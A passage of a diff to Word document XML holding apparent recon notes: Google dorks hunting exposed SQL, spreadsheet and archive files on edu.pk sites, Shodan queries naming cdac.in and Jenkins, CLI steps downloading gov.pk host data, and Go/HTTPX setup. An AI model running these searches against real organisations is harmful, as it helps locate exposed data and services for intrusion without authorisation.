+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>site:edu.pk</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>filetype:txt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>site:edu.pk</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>filetype:xlsx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>site:edu.pk</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>filetype:sql</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>site:edu.pk</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>filetype:zip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>site:edu.pk</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>filetype:tar</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId8" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:b/>
+            <w:bCs/>
+          </w:rPr>
+          <w:t>https://dheerajmadhukar.github.io/oh-my-dorks/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">     &lt;-----very IMP</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>--------------------------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>SHODAN:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>`````````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Websites are just one part of the Internet. Use Shodan to discover everything from power plants, mobile phones, refrigerators and Minecraft servers.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>DORKS:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">hostname:*.cdac.in </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>org:cdac</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>http.title:"Jenkins</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">" </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>port:8080</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>http.status:200</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>os:windows7</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>product:apache</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>country:cn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>city:pune</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>https://dheerajmadhukar.github.io/oh-my-dorks/shodan.html</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>-----------------------</w:t>
+      </w:r>
+      <w:r>
+        <w:t>---------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Shodan Developer API:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>````````````````````````````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">1) install </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>shodan</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> cli:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"># pip3 install </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>shodan</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">2) INIT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>shodan</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>api</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> key:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>shodan</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &lt;API_KEY&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Successfully initialized</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>3) Account Info:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>shodan</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> info</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Query credits available: 100</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Scan credits available: 100</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>4) Query &amp; Download results:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>``````````````````````````````````````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>a) Count (free):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>shodan</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> count </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>hostname:cdac.in</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>79</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>b) Download: [filename.json.gz]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>shodan</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> download --limit 10 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>gov_pk</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>hostname:gov.pk</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Search query:                   </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hostname:gov.pk</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Total number of results:        1723</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Query credits left:             100</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Output file:                    gov_pk.json.gz</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">  [################################----]   90%  00:00:03</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Saved 10 results into file gov_pk.json.gz</w:t>
+      </w:r>
+    </w:p>
     <w:p/>
     <w:p/>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>+</w:t>
+      </w:r>
+      <w:r>
+        <w:t>+</w:t>
+      </w:r>
+      <w:r>
+        <w:t>+++++++++++++++++++++++++++++++++++</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">|  SEE </w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>gz</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> FILE IN BEUTFULL WAY </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>beuty.bash</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> |</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>++</w:t>
+      </w:r>
+      <w:r>
+        <w:t>+</w:t>
+      </w:r>
+      <w:r>
+        <w:t>++++++++++++++++++++++++++++++++++</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>| SEE .</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>gz</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> file in GUI beutyGUI.html</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">                   |</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">| </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Required .</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>gz</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> file to </w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>json</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> format</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">                   |</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>+++++++++++++++++++++++++++++++++++++</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>| Required .</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>gz</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> file to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>json</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> format for GUI         |</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>+++++++++++++++++++++++++++++++++++++</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>--------------------------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>GO SETUP:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>```````````</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>`````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>$ cd ~</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">$ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>wget</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> https://go.dev/dl/go1.26.4.linux-amd64.tar.gz</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">$ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tar -C /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>/local -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>xzf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> go1.26.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>.linux-amd64.tar.gz</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>SHELL:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>$ echo $SHELL</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">$ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> vim ~/.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>zshrc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">$ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> vim ~/.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>bashrc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:t>--------add this lines at the last of this file---------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>export GOROOT=/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>/local/go</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>export GOPATH=$HOME/go</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>export PATH=$PATH:$GOROOT/bin:$GOPATH/bin</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>------------3lines complete----------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>$ source ~/.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>zshrc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>$ go version</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">go version go1.26.4 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>linux</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/amd64</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>--------------------------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Install HTTPX:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>````````````````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">$ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
